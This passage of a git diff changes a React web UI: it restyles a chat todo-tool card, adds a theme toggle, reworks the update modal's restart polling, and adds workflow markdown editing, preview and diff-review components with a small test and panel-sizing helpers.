     ? pickTodoEntries(state.metadata?.newTodos, state.metadata?.todos, state.input?.todos)
     : [];
   const showGenericToolPayload = toolName !== 'todo';
+  const isTodoTool = toolName === 'todo';
 
   // Reuse the shared helpers so the truncation rules stay in sync with the
   // delegate-task card and any other places that render tool input previews.
   const inputSummary = state.input
     ? truncateToolDisplayText(
         toolName === 'todo'
-          ? buildTodoSummary(state)
+          ? buildTodoSummary(state, t)
           : buildToolInputSummary(state.input),
       )
     : '';
   const displayTitle = state.title ? truncateToolDisplayText(state.title) : '';
   const workflowHeaderSummary = truncateToolDisplayText(buildRunWorkflowHeaderSummary(toolName, state, t));
+  const statusBadgeClass = isTodoTool
+    ? 'text-[11px] font-medium text-zinc-500'
+    : `text-[11px] font-medium px-1.5 py-0.5 rounded-md ${config.pill}`;
 
   if (isWaitingForAnswer) {
     // Outer spacing is owned by the part wrapper in SessionChat's parts map.
@@ -3551,7 +4493,7 @@ export function ChatToolPart({ part, pendingQuestion, onAnswer, onReject }: Chat
           </div>
         </div>
         <div className="ml-auto flex items-center gap-1.5 flex-shrink-0 self-center">
-          <span className={`text-[11px] font-medium px-1.5 py-0.5 rounded-md ${config.pill}`}>
+          <span className={statusBadgeClass}>
             {config.label}
           </span>
           <ChevronDown className="w-3 h-3 text-zinc-400 transition-transform group-open/tool:rotate-180" />
@@ -3559,18 +4501,28 @@ export function ChatToolPart({ part, pendingQuestion, onAnswer, onReject }: Chat
       </summary>
 
       <div className="border-t border-zinc-200/60 px-2.5 py-2 space-y-1.5 text-xs">
-        {toolName === 'todo' && todoEntries.length > 0 && (
-          <div className="rounded-md border border-zinc-200 bg-white/70 px-2 py-1.5">
-            <div className="mb-1.5 text-[11px] font-medium text-zinc-500">{t('chat.tool.todoStages')}</div>
-            <div className="space-y-1">
+        {isTodoTool && todoEntries.length > 0 && (
+          <div className="space-y-1.5">
+            <div className="flex items-center justify-between gap-3 text-[11px] font-medium text-zinc-500">
+              <span>{t('chat.tool.todoStages')}</span>
+              <span className="font-normal text-zinc-400">{todoEntries.length}</span>
+            </div>
+            <div className="divide-y divide-zinc-100">
               {todoEntries.map((todo, index) => (
-                <div key={todo.id || index} className="flex items-start gap-2 text-[11px]">
-                  <span className="mt-1 h-1.5 w-1.5 flex-shrink-0 rounded-full bg-zinc-300" />
-                  <span className="min-w-0 flex-1 text-zinc-700">
+                <div
+                  key={todo.id || index}
+                  className="grid grid-cols-[16px_minmax(0,1fr)_auto] items-start gap-2 py-1.5 text-[11px] first:pt-0 last:pb-0"
+                >
+                  <span className="mt-0.5 flex h-4 w-4 flex-shrink-0 items-center justify-center">
+                    {todoStatusIcon(todo.status)}
+                  </span>
+                  <span className={`min-w-0 leading-5 ${todoTextClass(todo.status)}`}>
                     {todo.activeForm && todo.status === 'in_progress' ? todo.activeForm : todo.content}
                   </span>
-                  <span className={`flex-shrink-0 rounded-full border px-1.5 py-0.5 leading-none ${todoStatusClass(todo.status)}`}>
-                    {todoStatusLabel(todo.status)}
+                  <span
+                    className={`flex-shrink-0 whitespace-nowrap leading-5 ${todoStatusLabelClass(todo.status)}`}
+                  >
+                    {todoStatusLabel(todo.status, t)}
                   </span>
                 </div>
               ))}
@@ -3629,6 +4581,8 @@ export function ChatToolPart({ part, pendingQuestion, onAnswer, onReject }: Chat
 export const ChatMessageBubble = memo(ChatMessageBubbleInner, (prev, next) => {
   if (prev.isActive !== next.isActive) return false;
   if (prev.showActions !== next.showActions) return false;
+  if (prev.collapseIntermediateSteps !== next.collapseIntermediateSteps) return false;
+  if (prev.processGroupsDefaultOpen !== next.processGroupsDefaultOpen) return false;
   if (prev.editingMessageId !== next.editingMessageId) return false;
   if (prev.editingText !== next.editingText) return false;
   if (prev.actionsDisabled !== next.actionsDisabled) return false;
diff --git a/webui/src/components/common/ThemeToggle.tsx b/webui/src/components/common/ThemeToggle.tsx
new file mode 100644
index 000000000..6089a99bb
--- /dev/null
+++ b/webui/src/components/common/ThemeToggle.tsx
@@ -0,0 +1,33 @@
+import { Moon, Sun } from 'lucide-react';
+import { useContext } from 'react';
+import { useTranslation } from 'react-i18next';
+import { ThemeContext } from '@/contexts/ThemeContext';
+
+interface ThemeToggleProps {
+  collapsed?: boolean;
+}
+/** Icon button that calls ThemeContext.toggleTheme; shows Sun while dark, Moon otherwise. NOTE(review): both `collapsed` size branches are identical — confirm intended. */
+export default function ThemeToggle({ collapsed = false }: ThemeToggleProps) {
+  const { theme, toggleTheme } = useContext(ThemeContext);
+  const { t } = useTranslation('nav');
+  const isDark = theme === 'dark';
+  const Icon = isDark ? Sun : Moon;
+  const actionLabel = isDark ? t('switchToLightTheme') : t('switchToDarkTheme'); // Shared by title and aria-label.
+  return (
+    <button
+      type="button"
+      onClick={toggleTheme}
+      title={actionLabel}
+      aria-label={actionLabel}
+      aria-pressed={isDark}
+      className={`
+        flex items-center justify-center rounded-lg transition-colors
+        text-zinc-500 hover:bg-white/70 hover:text-zinc-900
+        dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100
+        ${collapsed ? 'h-8 w-8' : 'h-8 w-8'}
+      `}
+    >
+      <Icon className="h-4 w-4" />
+    </button>
+  );
+}
diff --git a/webui/src/components/common/UpdateModal.tsx b/webui/src/components/common/UpdateModal.tsx
index b9c5e29b8..ece1d658e 100644
--- a/webui/src/components/common/UpdateModal.tsx
+++ b/webui/src/components/common/UpdateModal.tsx
@@ -17,10 +17,10 @@ import {
 import { useTranslation } from 'react-i18next';
 import { checkUpdate, applyUpdate, VersionInfo, UpdateProgress, type UpdateEdition } from '@/api/update';
 import { getLocalizedReleaseNotes } from '@/utils/releaseNotes';
+import { checkRestartReadiness } from '@/utils/restartPolling';
 
 // ------------------------------------------------------------------ //
 
-const UPGRADE_PAGE_MARKER = 'flocks-upgrade-in-progress';
 const HEALTH_POLL_INTERVAL = 2000;
 const HEALTH_POLL_TIMEOUT = 5 * 60 * 1000;
 
@@ -54,6 +54,7 @@ export default function UpdateModal({ initialInfo, edition = 'flocks', canUpgrad
   // useRef avoids stale closure: the `restarting` value inside async callbacks
   // always reflects the latest state even after re-renders.
   const restartingRef = useRef(false);
+  const restartFailureReasonRef = useRef('');
   const setRestartingSync = (val: boolean) => {
     restartingRef.current = val;
     setRestarting(val);
@@ -98,6 +99,7 @@ export default function UpdateModal({ initialInfo, edition = 'flocks', canUpgrad
           return next;
         });
         if (progress.stage === 'restarting') {
+          restartFailureReasonRef.current = '';
           setRestartingSync(true);
           pollUntilReady();
         }
@@ -108,6 +110,8 @@ export default function UpdateModal({ initialInfo, edition = 'flocks', canUpgrad
       if (!restartingRef.current) {
         setError(e.message ?? t('upgradeFailed'));
         setUpgrading(false);
+      } else if (e?.message) {
+        restartFailureReasonRef.current = e.message;
       }
     }
   }, [edition, i18n.language, info, t]);
@@ -120,28 +124,22 @@ export default function UpdateModal({ initialInfo, edition = 'flocks', canUpgrad
 
   const pollUntilReady = () => {
     const start = Date.now();
+    let lastPollFailure = '';
     const poll = async () => {
       if (Date.now() - start > HEALTH_POLL_TIMEOUT) {
-        setError(t('restartTimeout'));
+        const reason = restartFailureReasonRef.current || lastPollFailure || t('restartUnknown');
+        setError(t('restartTimeout', { reason }));
         setRestartingSync(false);
         setUpgrading(false);
         return;
       }
 
-      try {
-        const rootResponse = await fetch('/', { cache: 'no-store' });
-        const rootHtml = await rootResponse.text();
-        const stillShowingUpgradePage = rootHtml.includes(UPGRADE_PAGE_MARKER);
-
-        if (rootResponse.ok && !stillShowingUpgradePage) {
-          const healthResponse = await fetch('/api/health', { cache: 'no-store' });
-          if (healthResponse.ok) {
-            window.location.reload();
-            return;
-          }
-        }
-      } catch {
+      const readiness = await checkRestartReadiness();
+      if (readiness.ready) {
+        window.location.reload();
+        return;
       }
+      lastPollFailure = readiness.reason || lastPollFailure;
 
       setTimeout(() => {
         void poll();
diff --git a/webui/src/components/common/WorkflowDocumentPanel.tsx b/webui/src/components/common/WorkflowDocumentPanel.tsx
new file mode 100644
index 000000000..34012c058
--- /dev/null
+++ b/webui/src/components/common/WorkflowDocumentPanel.tsx
@@ -0,0 +1,203 @@
+import type { ReactNode } from 'react';
+import ReactMarkdown from 'react-markdown';
+import { useTranslation } from 'react-i18next';
+import remarkGfm from 'remark-gfm';
+import { Download, Eye, FileText, Pencil, Save, Sparkles, Workflow as WorkflowIcon } from 'lucide-react';
+
+import WorkflowMarkdownEditor from './WorkflowMarkdownEditor';
+
+export type WorkflowDocumentMode = 'edit' | 'preview';
+
+interface WorkflowDocumentPanelProps {
+  editorId?: string;
+  mode: WorkflowDocumentMode;
+  value: string;
+  dirty: boolean;
+  saving: boolean;
+  resetDisabled?: boolean;
+  saveDisabled?: boolean;
+  generateWorkflowDisabled?: boolean;
+  error?: string | null;
+  diffReview?: ReactNode;
+  onModeChange: (mode: WorkflowDocumentMode) => void;
+  onChange: (value: string) => void;
+  onResetDocument: () => void;
+  onSave: () => void;
+  onGenerateWorkflow: () => void;
+  onDownload: () => void;
+}
+/** Toolbar (edit/preview toggle, reset, save, generate workflow) above the markdown editor or supplied diffReview, a rendered preview, or an empty state. */
+export default function WorkflowDocumentPanel({
+  editorId,
+  mode,
+  value,
+  dirty,
+  saving,
+  resetDisabled = false,
+  saveDisabled = false,
+  generateWorkflowDisabled = false,
+  error,
+  diffReview,
+  onModeChange,
+  onChange,
+  onResetDocument,
+  onSave,
+  onGenerateWorkflow,
+  onDownload,
+}: WorkflowDocumentPanelProps) {
+  const { t } = useTranslation('workflow');
+  const hasContent = value.trim().length > 0;
+  // hasContent treats whitespace-only text as empty; it picks generate vs. regenerate wording and gates download/preview.
+  return (
+    <div className="absolute inset-0 flex flex-col bg-white">
+      <div className="flex flex-shrink-0 items-center justify-between gap-3 overflow-hidden border-b border-gray-200 px-4 py-2.5">
+        <div className="min-w-0">
+          <div className="flex items-center gap-2">
+            <FileText className="h-4 w-4 flex-shrink-0 text-gray-500" />
+            <h2 className="truncate text-sm font-semibold text-gray-900">{t('detail.editDocTitle')}</h2>
+            {dirty ? (
+              <span className="rounded bg-amber-50 px-1.5 py-0.5 text-[10px] font-medium text-amber-700">
+                {t('detail.editDocUnsaved')}
+              </span>
+            ) : null}
+          </div>
+          <p className="mt-0.5 truncate text-[11px] text-gray-400">workflow.md</p>
+        </div>
+
+        <div className="flex min-w-0 flex-shrink items-center gap-2 overflow-x-auto pb-0.5 [scrollbar-width:none] [&::-webkit-scrollbar]:hidden">
+          {error ? (
+            <span className="max-w-[180px] truncate rounded bg-red-50 px-2 py-1 text-[11px] font-medium text-red-600">
+              {error}
+            </span>
+          ) : null}
+          <div className="flex flex-shrink-0 rounded-lg border border-gray-200 bg-gray-50 p-0.5">
+            <button
+              type="button"
+              onClick={() => onModeChange('edit')}
+              className={`inline-flex h-9 flex-shrink-0 items-center gap-1.5 whitespace-nowrap rounded-md px-2.5 text-xs font-medium transition-colors ${
+                mode === 'edit'
+                  ? 'bg-white text-gray-900 shadow-sm'
+                  : 'text-gray-500 hover:text-gray-700'
+              }`}
+              title={t('detail.editDocModeEdit')}
+            >
+              <Pencil className="h-3.5 w-3.5" />
+              <span className="max-[560px]:hidden">{t('detail.editDocModeEdit')}</span>
+            </button>
+            <button
+              type="button"
+              onClick={() => onModeChange('preview')}
+              className={`inline-flex h-9 flex-shrink-0 items-center gap-1.5 whitespace-nowrap rounded-md px-2.5 text-xs font-medium transition-colors ${
+                mode === 'preview'
+                  ? 'bg-white text-gray-900 shadow-sm'
+                  : 'text-gray-500 hover:text-gray-700'
+              }`}
+              title={t('detail.editDocModePreview')}
+            >
+              <Eye className="h-3.5 w-3.5" />
+              <span className="max-[560px]:hidden">{t('detail.editDocModePreview')}</span>
+            </button>
+          </div>
+
+          <button
+            type="button"
+            onClick={onResetDocument}
+            disabled={resetDisabled}
+            className="inline-flex h-9 flex-shrink-0 items-center gap-1.5 whitespace-nowrap rounded-lg border border-gray-200 bg-white px-3 text-xs font-medium text-gray-600 shadow-sm transition-colors hover:bg-gray-50 hover:text-gray-900 disabled:cursor-not-allowed disabled:opacity-40 max-[560px]:px-2.5"
+            title={hasContent ? t('detail.regenerateEditDocTitle') : t('detail.generateEditDocTitle')}
+          >
+            <Sparkles className="h-3.5 w-3.5" />
+            <span className="max-[680px]:hidden">{hasContent ? t('detail.regenerateEditDoc') : t('detail.generateEditDoc')}</span>
+          </button>
+          <button
+            type="button"
+            onClick={onSave}
+            disabled={saveDisabled}
+            className="inline-flex h-9 flex-shrink-0 items-center gap-1.5 whitespace-nowrap rounded-lg bg-red-600 px-3 text-xs font-semibold text-white shadow-sm transition-colors hover:bg-red-700 disabled:cursor-not-allowed disabled:bg-gray-200 disabled:text-gray-400 disabled:shadow-none max-[560px]:px-2.5"
+            title={saving ? t('detail.editDocSaving') : t('detail.editDocSave')}
+          >
+            <Save className="h-3.5 w-3.5" />
+            <span className="max-[680px]:hidden">{saving ? t('detail.editDocSaving') : t('detail.editDocSave')}</span>
+          </button>
+          <button
+            type="button"
+            onClick={onGenerateWorkflow}
+            disabled={generateWorkflowDisabled}
+            className="inline-flex h-9 flex-shrink-0 items-center gap-1.5 whitespace-nowrap rounded-lg bg-slate-900 px-3 text-xs font-semibold text-white shadow-sm transition-colors hover:bg-slate-800 disabled:cursor-not-allowed disabled:bg-gray-200 disabled:text-gray-400 disabled:shadow-none max-[560px]:px-2.5"
+            title={t('detail.generateWorkflowTitle')}
+          >
+            <WorkflowIcon className="h-3.5 w-3.5" />
+            <span className="max-[760px]:hidden">{t('detail.generateWorkflow')}</span>
+          </button>
+        </div>
+      </div>
+
+      {mode === 'edit' ? (
+        diffReview ?? (
+          <div className="relative flex min-h-0 flex-1 overflow-hidden bg-slate-950">
+            {hasContent ? (
+              <FloatingDownloadButton tone="dark" onClick={onDownload} />
+            ) : null}
+            <div className="flex min-h-0 min-w-0 flex-1 overflow-hidden [&_textarea]:pr-48">
+              <WorkflowMarkdownEditor
+                id={editorId}
+                label={t('detail.editDocTextareaLabel')}
+                placeholder={t('detail.editDocPlaceholder')}
+                value={value}
+                onChange={onChange}
+              />
+            </div>
+          </div>
+        )
+      ) : hasContent ? (
+        <div className="relative min-h-0 flex-1 overflow-y-auto bg-white px-6 pb-6 pt-14">
+          <FloatingDownloadButton tone="light" onClick={onDownload} />
+          <div className="mx-auto max-w-3xl prose prose-sm prose-gray leading-relaxed">
+            <ReactMarkdown remarkPlugins={[remarkGfm]}>{value}</ReactMarkdown>
+          </div>
+        </div>
+      ) : (
+        <div className="flex min-h-0 flex-1 flex-col items-center justify-center gap-3 bg-gray-50 text-gray-400">
+          <FileText className="h-10 w-10 opacity-40" />
+          <p className="text-sm font-medium text-gray-500">{t('detail.editDocEmpty')}</p>
+          <p className="max-w-sm text-center text-xs leading-relaxed">{t('detail.editDocEmptyHint')}</p>
+          <button
+            type="button"
+            onClick={onResetDocument}
+            disabled={resetDisabled}
+            className="mt-1 inline-flex items-center gap-1.5 rounded-lg bg-red-600 px-3 py-1.5 text-xs font-semibold text-white shadow-sm transition-colors hover:bg-red-700 disabled:cursor-not-allowed disabled:bg-gray-200 disabled:text-gray-400 disabled:shadow-none"
+          >
+            <Sparkles className="h-3.5 w-3.5" />
+            {t('detail.generateEditDoc')}
+          </button>
+        </div>
+      )}
+    </div>
+  );
+}
+/** Absolutely positioned download button; `tone` selects the dark or light class set and `onClick` is forwarded to the button. */
+function FloatingDownloadButton({
+  tone,
+  onClick,
+}: {
+  tone: 'dark' | 'light';
+  onClick: () => void;
+}) {
+  const { t } = useTranslation('workflow');
+
+  return (
+    <button
+      type="button"
+      onClick={onClick}
+      className={
+        tone === 'dark'
+          ? 'absolute right-5 top-3 z-20 inline-flex max-w-[calc(100%-2.5rem)] items-center gap-1.5 rounded-lg border border-slate-700 bg-slate-800/95 px-3 py-1.5 text-xs font-medium text-slate-100 shadow-sm transition-colors hover:bg-slate-700'
+          : 'absolute right-5 top-3 z-20 inline-flex max-w-[calc(100%-2.5rem)] items-center gap-1.5 rounded-lg border border-gray-200 bg-white px-3 py-1.5 text-xs font-medium text-gray-700 shadow-sm transition-colors hover:bg-gray-50 hover:text-gray-900'
+      }
+      title={t('detail.downloadMdTitle')}
+    >
+      <Download className="h-3.5 w-3.5" />
+      {t('detail.downloadMd')}
+    </button>
+  );
+}
diff --git a/webui/src/components/common/WorkflowMarkdownDiffReview.tsx b/webui/src/components/common/WorkflowMarkdownDiffReview.tsx
new file mode 100644
index 000000000..eb3b3e5c8
--- /dev/null
+++ b/webui/src/components/common/WorkflowMarkdownDiffReview.tsx
@@ -0,0 +1,174 @@
+import { useMemo } from 'react';
+import { Check, GitCompare, Undo2 } from 'lucide-react';
+import { useTranslation } from 'react-i18next';
+import type { TextDiffHunk, TextDiffLine } from '@/utils/textDiff';
+
+interface WorkflowMarkdownDiffReviewProps {
+  lines: TextDiffLine[];
+  hunks: TextDiffHunk[];
+  added: number;
+  removed: number;
+  reviewingId: string | null;
+  disabled: boolean;
+  onAccept: () => void;
+  onReject: () => void;
+  onAcceptHunk: (hunk: TextDiffHunk) => void;
+  onRejectHunk: (hunk: TextDiffHunk) => void;
+}
+/** Renders a line-by-line diff of workflow.md with accept/reject controls for the whole change and for each hunk. */
+export default function WorkflowMarkdownDiffReview({
+  lines,
+  hunks,
+  added,
+  removed,
+  reviewingId,
+  disabled,
+  onAccept,
+  onReject,
+  onAcceptHunk,
+  onRejectHunk,
+}: WorkflowMarkdownDiffReviewProps) {
+  const { t } = useTranslation('workflow');
+  // Index hunks by the line where their change starts, remembering each hunk's
+  // 1-based ordinal so hunk headers need no findIndex scan during render.
+  const hunkByStart = useMemo(() => {
+    const lookup = new Map<number, { hunk: TextDiffHunk; ordinal: number }>();
+    hunks.forEach((hunk, position) => lookup.set(hunk.changeStartLineIndex, { hunk, ordinal: position + 1 }));
+    return lookup;
+  }, [hunks]);
+
+  const rowClass = (line: TextDiffLine) => {
+    if (line.type === 'add') return 'bg-emerald-950/40 text-emerald-50';
+    if (line.type === 'remove') return 'bg-red-950/45 text-red-50';
+    return 'bg-slate-950 text-slate-200';
+  };
+  const gutterClass = (line: TextDiffLine) => {
+    if (line.type === 'add') return 'bg-emerald-950/70 text-emerald-300';
+    if (line.type === 'remove') return 'bg-red-950/70 text-red-300';
+    return 'bg-slate-900/70 text-slate-500';
+  };
+  const marker = (line: TextDiffLine) => {
+    if (line.type === 'add') return '+';
+    if (line.type === 'remove') return '-';
+    return ' ';
+  };
+
+  return (
+    <div
+      data-testid="workflow-md-diff-review"
+      className="flex min-h-0 flex-1 flex-col bg-slate-950 text-slate-100"
+    >
+      <div className="flex flex-shrink-0 flex-wrap items-center justify-between gap-3 border-b border-slate-800 bg-slate-900 px-4 py-2.5">
+        <div className="min-w-0">
+          <div className="flex min-w-0 items-center gap-2 text-xs text-slate-300">
+            <GitCompare className="h-3.5 w-3.5 flex-shrink-0 text-slate-400" />
+            <span className="font-medium text-slate-100">{t('detail.editDocDiffTitle')}</span>
+            <span className="text-slate-500">workflow.md</span>
+          </div>
+          <p className="mt-1 text-[11px] text-slate-400">
+            {t('detail.editDocDiffReviewDesc')}
+          </p>
+        </div>
+
+        <div className="flex flex-shrink-0 flex-wrap items-center justify-end gap-2">
+          <div className="flex items-center gap-2 text-[11px] font-medium">
+            <span className="rounded bg-emerald-500/15 px-1.5 py-0.5 text-emerald-300">
+              +{added} {t('detail.editDocDiffAdded')}
+            </span>
+            <span className="rounded bg-red-500/15 px-1.5 py-0.5 text-red-300">
+              -{removed} {t('detail.editDocDiffRemoved')}
+            </span>
+          </div>
+          <button
+            type="button"
+            onClick={onAccept}
+            disabled={disabled}
+            className="inline-flex items-center gap-1.5 rounded-md bg-emerald-500 px-2.5 py-1.5 text-xs font-semibold text-emerald-950 shadow-sm transition-colors hover:bg-emerald-400 disabled:cursor-not-allowed disabled:opacity-50"
+          >
+            <Check className="h-3.5 w-3.5" />
+            {t('detail.editDocDiffAccept')}
+          </button>
+          <button
+            type="button"
+            onClick={onReject}
+            disabled={disabled}
+            className="inline-flex items-center gap-1.5 rounded-md border border-red-400/40 bg-red-500/10 px-2.5 py-1.5 text-xs font-semibold text-red-200 shadow-sm transition-colors hover:bg-red-500/20 disabled:cursor-not-allowed disabled:opacity-50"
+          >
+            <Undo2 className="h-3.5 w-3.5" />
+            {reviewingId === 'reject' ? t('detail.editDocDiffRejecting') : t('detail.editDocDiffReject')}
+          </button>
+        </div>
+      </div>
+
+      <div className="min-h-0 flex-1 overflow-auto bg-slate-950">
+        <div className="min-w-[720px] font-mono text-sm leading-6">
+          {lines.length > 0 ? lines.map((line, index) => {
+            const hunkEntry = hunkByStart.get(index);
+            const hunk = hunkEntry?.hunk;
+            return (
+              <div key={`${line.type}-${line.oldLine ?? ''}-${line.newLine ?? ''}-${index}`}>
+                {hunk && (
+                  <div className="flex flex-wrap items-center justify-between gap-2 border-y border-slate-800 bg-slate-900/95 px-4 py-2">
+                    <div className="flex min-w-0 items-center gap-2 text-xs text-slate-300">
+                      <span className="font-semibold text-slate-100">
+                        {t('detail.editDocDiffHunkTitle', { index: hunkEntry?.ordinal })}
+                      </span>
+                      <span className="rounded bg-emerald-500/15 px-1.5 py-0.5 text-[11px] font-medium text-emerald-300">
+                        +{hunk.added}
+                      </span>
+                      <span className="rounded bg-red-500/15 px-1.5 py-0.5 text-[11px] font-medium text-red-300">
+                        -{hunk.removed}
+                      </span>
+                    </div>
+                    <div className="flex flex-shrink-0 items-center gap-2">
+                      <button
+                        type="button"
+                        onClick={() => onAcceptHunk(hunk)}
+                        disabled={disabled}
+                        className="inline-flex items-center gap-1 rounded-md bg-emerald-500/15 px-2 py-1 text-[11px] font-semibold text-emerald-200 transition-colors hover:bg-emerald-500/25 disabled:cursor-not-allowed disabled:opacity-50"
+                      >
+                        <Check className="h-3 w-3" />
+                        {t('detail.editDocDiffAcceptHunk')}
+                      </button>
+                      <button
+                        type="button"
+                        onClick={() => onRejectHunk(hunk)}
+                        disabled={disabled}
+                        className="inline-flex items-center gap-1 rounded-md bg-red-500/15 px-2 py-1 text-[11px] font-semibold text-red-200 transition-colors hover:bg-red-500/25 disabled:cursor-not-allowed disabled:opacity-50"
+                      >
+                        <Undo2 className="h-3 w-3" />
+                        {reviewingId === `reject:${hunk.id}`
+                          ? t('detail.editDocDiffRejecting')
+                          : t('detail.editDocDiffRejectHunk')}
+                      </button>
+                    </div>
+                  </div>
+                )}
+                <div
+                  className={`grid grid-cols-[56px_56px_28px_minmax(0,1fr)] border-b border-slate-900/70 ${rowClass(line)}`}
+                >
+                  <div className={`select-none px-2 py-0.5 text-right ${gutterClass(line)}`}>
+                    {line.oldLine ?? ''}
+                  </div>
+                  <div className={`select-none px-2 py-0.5 text-right ${gutterClass(line)}`}>
+                    {line.newLine ?? ''}
+                  </div>
+                  <div className={`select-none px-2 py-0.5 text-center font-semibold ${gutterClass(line)}`}>
+                    {marker(line)}
+                  </div>
+                  <pre className="min-w-0 overflow-visible whitespace-pre-wrap break-words px-4 py-0.5 font-mono">
+                    {line.text || ' '}
+                  </pre>
+                </div>
+              </div>
+            );
+          }) : (
+            <div className="px-4 py-8 text-center text-sm text-slate-400">
+              {t('detail.editDocDiffEmpty')}
+            </div>
+          )}
+        </div>
+      </div>
+    </div>
+  );
+}
diff --git a/webui/src/components/common/WorkflowMarkdownEditor.tsx b/webui/src/components/common/WorkflowMarkdownEditor.tsx
new file mode 100644
index 000000000..df9124573
--- /dev/null
+++ b/webui/src/components/common/WorkflowMarkdownEditor.tsx
@@ -0,0 +1,66 @@
+import { useCallback, useEffect, useMemo, useRef } from 'react';
+/** Props accepted by WorkflowMarkdownEditor. */
+interface WorkflowMarkdownEditorProps {
+  id?: string; // id of the <textarea>; also the target of the label's htmlFor
+  label: string; // text rendered inside the visually hidden (sr-only) label
+  placeholder?: string; // forwarded to the <textarea> placeholder attribute
+  value: string; // current editor text (the textarea is controlled)
+  onChange: (value: string) => void; // called with event.target.value on each change event
+}
+/** Controlled, non-wrapping monospace textarea with a line-number gutter that tracks its vertical scroll. */
+export default function WorkflowMarkdownEditor({
+  id = 'workflow-edit-doc',
+  label,
+  placeholder = '',
+  value,
+  onChange,
+}: WorkflowMarkdownEditorProps) {
+  const textareaRef = useRef<HTMLTextAreaElement | null>(null);
+  const lineNumberTrackRef = useRef<HTMLDivElement | null>(null);
+  const lineNumbers = useMemo(() => { // [1..N], one entry per '\n'-separated line, never empty
+    const totalLines = Math.max(1, value.split('\n').length);
+    return Array.from({ length: totalLines }, (_, index) => index + 1);
+  }, [value]);
+  const gutterWidth = Math.max(56, String(lineNumbers.length).length * 8 + 32); // 8 per digit + 32, at least 56
+  // Moves the number track up by the textarea's scrollTop so each number stays beside its line.
+  const syncLineNumberOffset = useCallback(() => {
+    if (!lineNumberTrackRef.current) return;
+    const scrollTop = textareaRef.current?.scrollTop ?? 0;
+    lineNumberTrackRef.current.style.transform = `translateY(-${scrollTop}px)`;
+  }, []);
+  // Re-apply the offset whenever the line count changes.
+  useEffect(() => {
+    syncLineNumberOffset();
+  }, [lineNumbers.length, syncLineNumberOffset]);
+  // The gutter is aria-hidden; the sr-only <label> is tied to the textarea through htmlFor/id.
+  return (
+    <div className="flex h-full min-h-0 w-full flex-1 overflow-hidden bg-slate-950">
+      <label htmlFor={id} className="sr-only">{label}</label>
+      <div
+        aria-hidden="true"
+        data-testid="workflow-md-line-numbers"
+        className="h-full flex-shrink-0 overflow-hidden select-none border-r border-slate-800 bg-slate-900/80 py-5 pr-3 text-right font-mono text-sm leading-6 text-slate-500"
+        style={{ width: gutterWidth }}
+      >
+        <div ref={lineNumberTrackRef}>
+          {lineNumbers.map((lineNumber) => (
+            <div key={lineNumber} data-line-number={lineNumber} className="h-6 leading-6">
+              {lineNumber}
+            </div>
+          ))}
+        </div>
+      </div>
+      <textarea
+        ref={textareaRef}
+        id={id}
+        value={value}
+        onChange={(event) => onChange(event.target.value)}
+        onScroll={syncLineNumberOffset}
+        placeholder={placeholder}
+        wrap="off"
+        className="h-full min-h-0 min-w-0 w-full resize-none overflow-auto border-0 bg-slate-950 px-6 py-5 font-mono text-sm leading-6 text-slate-100 caret-red-300 outline-none selection:bg-red-500/30 placeholder:text-slate-500"
+        spellCheck={false}
+      />
+    </div>
+  );
+}
diff --git a/webui/src/components/common/WorkflowStatusBadge.test.tsx b/webui/src/components/common/WorkflowStatusBadge.test.tsx
new file mode 100644
index 000000000..485280d57
--- /dev/null
+++ b/webui/src/components/common/WorkflowStatusBadge.test.tsx
@@ -0,0 +1,17 @@
+import { render, screen } from '@testing-library/react';
+import { describe, expect, it, vi } from 'vitest';
+import WorkflowStatusBadge from './WorkflowStatusBadge';
+// Stub react-i18next: t() ignores the key and returns options.defaultValue, or '' when none is given.
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (_key: string, options?: { defaultValue?: string }) => options?.defaultValue ?? '',
+  }),
+}));
+// Pins the class names applied to the element that displays the text 'running'.
+describe('WorkflowStatusBadge', () => {
+  it('renders running status as a healthy green badge', () => {
+    render(<WorkflowStatusBadge status="running" />);
+
+    expect(screen.getByText('running')).toHaveClass('bg-green-100', 'text-green-700');
+  });
+});
diff --git a/webui/src/components/common/WorkflowStatusBadge.tsx b/webui/src/components/common/WorkflowStatusBadge.tsx
index 7c7a24962..235e98096 100644
--- a/webui/src/components/common/WorkflowStatusBadge.tsx
+++ b/webui/src/components/common/WorkflowStatusBadge.tsx
@@ -13,7 +13,7 @@ interface StatusConfig {
 }
 
 const STATUS_STYLE_MAP: Record<string, StatusConfig> = {
-  running:    { className: 'bg-red-100 text-red-700',    dot: 'bg-red-500' },
+  running:    { className: 'bg-green-100 text-green-700', dot: 'bg-green-500' },
   cancelling: { className: 'bg-amber-100 text-amber-700', dot: 'bg-amber-500' },
   publishing: { className: 'bg-yellow-100 text-yellow-700', dot: 'bg-yellow-500' },
   success:    { className: 'bg-green-100 text-green-700',  dot: 'bg-green-500' },
diff --git a/webui/src/components/common/sidePanelSizing.ts b/webui/src/components/common/sidePanelSizing.ts
new file mode 100644
index 000000000..6266d5f40
--- /dev/null
+++ b/webui/src/components/common/sidePanelSizing.ts
@@ -0,0 +1,18 @@
+export const SIDE_PANEL_MIN_WIDTH = 240; // lower bound applied to every width computed in this module
+export const SIDE_PANEL_INITIAL_RATIO = 0.4; // share of the available width used for the initial panel width
+export const SIDE_PANEL_MAX_RATIO = 0.7; // share of the available width used for the maximum panel width
+export const DESKTOP_SIDEBAR_WIDTH = 256; // subtracted from window.innerWidth when innerWidth >= 1024
+/** Width left for content: window.innerWidth minus the sidebar on wide (>= 1024) viewports, never below the minimum. */
+function getAvailableWidth() {
+  const viewportWidth = typeof window === 'undefined' ? null : window.innerWidth;
+  if (viewportWidth === null) return 1024; // no window object available: fall back to 1024
+  return Math.max(SIDE_PANEL_MIN_WIDTH, viewportWidth - (viewportWidth >= 1024 ? DESKTOP_SIDEBAR_WIDTH : 0));
+}
+/** Initial panel width: SIDE_PANEL_INITIAL_RATIO of the available width, rounded, never below the minimum. */
+export function getInitialSidePanelWidth() {
+  return Math.max(Math.round(SIDE_PANEL_INITIAL_RATIO * getAvailableWidth()), SIDE_PANEL_MIN_WIDTH);
+}
+/** Maximum panel width: SIDE_PANEL_MAX_RATIO of the available width, rounded, never below the minimum. */
+export function getMaxSidePanelWidth() {
+  return Math.max(Math.round(SIDE_PANEL_MAX_RATIO * getAvailableWidth()), SIDE_PANEL_MIN_WIDTH);
+}
diff --git a/webui/src/components/common/toolStageSummary.test.ts b/webui/src/components/common/toolStageSummary.test.ts
index d22033b58..cf8162711 100644
--- a/webui/src/components/common/toolStageSummary.test.ts
+++ b/webui/src/components/common/toolStageSummary.test.ts
